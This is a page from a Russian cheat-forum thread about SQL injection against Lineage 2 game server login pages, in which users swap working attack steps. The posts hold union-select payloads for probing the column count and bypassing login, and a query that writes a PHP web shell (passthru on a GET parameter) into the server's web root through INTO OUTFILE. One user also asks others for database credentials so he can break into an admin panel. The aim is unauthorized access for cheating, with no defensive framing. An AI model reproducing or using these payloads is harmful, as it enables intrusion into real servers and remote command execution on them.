Регистрация Главная Сообщество
Сообщения за день Справка Регистрация

SQL инъекция

-

Баги и читы Lineage 2

- Уязвимости, баги и читы для Lineage 2 в этом разделе

Ответ
Страница 4 из 4 « First 23 4
 
Опции темы
Старый 04.01.2011, 21:36   #46
 Разведчик
Аватар для Calypso
 
Calypso никому не известный тип
Регистрация: 27.07.2009
Сообщений: 3
Популярность: 10
Сказал(а) спасибо: 0
Поблагодарили 0 раз(а) в 0 сообщениях
Отправить сообщение для Calypso с помощью ICQ
 
По умолчанию Re: SQL инъекция
Цитата:
Сообщение от UnderwhyПосмотреть сообщение
ошибка должна быть.

Жмем в адресной строке отправить - logout прошел.
Теперь надо выяснить, сколько столбцов запрашивается в скрипте логина (что бы сделать нормальный union). Идем на страницу логина, в поле логина пишем так:
dsafasd'union select 1,2,3#
пароль пишем любой, жмем логин - не пустило, Access filed. Пытаемся с таким логином:
dsafasd'union select 1,2,3,4#Опять не пустило. Продолжаем перебор, пока логин не пройдет. C логином
dsafasd'union select 1,2,3,4,5,6# получилось войти.


повыделяй облась выше этого поля. Обычно ошибка написана цветом фона

Хммм подскажите,дошол до того как зайти... Зашол но ошибки сверху не вылезли что делать?
  Ответить с цитированием
Старый 11.01.2011, 16:26   #47
 Разведчик
Аватар для wildking
 
wildking на правильном путиwildking на правильном пути
Регистрация: 24.09.2009
Сообщений: 29
Популярность: 136
Сказал(а) спасибо: 49
Поблагодарили 64 раз(а) в 28 сообщениях
Отправить сообщение для wildking с помощью Skype™
 
По умолчанию Re: SQL инъекция
В общем вошел

[Ссылки могут видеть только зарегистрированные пользователи. ]

Но запросом
PHP код:
sdfasd'union select null,null,null,null,null,'<?php passthru($_GET["cmd"]); ?>' into outfile 'c:\xampp\htdocs\acm/class.php'#
[Ссылки могут видеть только зарегистрированные пользователи. ]

шелл не записывает. Что с путями не так ?
  Ответить с цитированием
Старый 30.01.2011, 17:03   #48
 Разведчик
Аватар для S.e.n.s.o.R
 
S.e.n.s.o.R никому не известный тип
Регистрация: 17.01.2011
Сообщений: 10
Популярность: 10
Сказал(а) спасибо: 10
Поблагодарили 0 раз(а) в 0 сообщениях
 
По умолчанию Re: SQL инъекция
А я никак не могу поломать админку [Ссылки могут видеть только зарегистрированные пользователи. ]
ктонить по-братски скажите логин и пасс от мускуля, или скажите как тут быть? Я сам посиотрю...Я прост первый раз иньку юзаю
  Ответить с цитированием
Старый 01.02.2011, 15:44   #49
 Разведчик
Аватар для [Cemik]
 
[Cemik] никому не известный тип
Регистрация: 02.05.2010
Сообщений: 1
Популярность: 10
Сказал(а) спасибо: 0
Поблагодарили 0 раз(а) в 0 сообщениях
 
По умолчанию Re: SQL инъекция
пробую подбор ничего не выходит пишет Login Failed
  Ответить с цитированием
Ответ
Страница 4 из 4 « First 23 4

« Предыдущая тема | Следующая тема »

Ваши права в разделе
Вы не можете создавать новые темы
Вы не можете отвечать в темах
Вы не можете прикреплять вложения
Вы не можете редактировать свои сообщения
BB коды Вкл.
Смайлы Вкл.
[IMG] код Вкл.
HTML код Выкл.
Быстрый переход

Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
[Уязвимость] [VIP] Инъекция некоторых птс Hummel Подполье Lineage 2 (0 уровень) 0 22.11.2008 19:01

Заявление об ответственности / Список мошенников

Часовой пояс GMT +4, время: 00:00.

Обратная связь - Zhyk.org - Первый Чит-портал RUнета без хайдов! - Архив - Условия использования - Вверх
Пишите нам: [email protected]
Copyright © 2024 vBulletin Solutions, Inc.
Translate: zCarot. Webdesign by DevArt (Fox)
G-gaMe! Team production | Since 2008
Hosted by GShost.net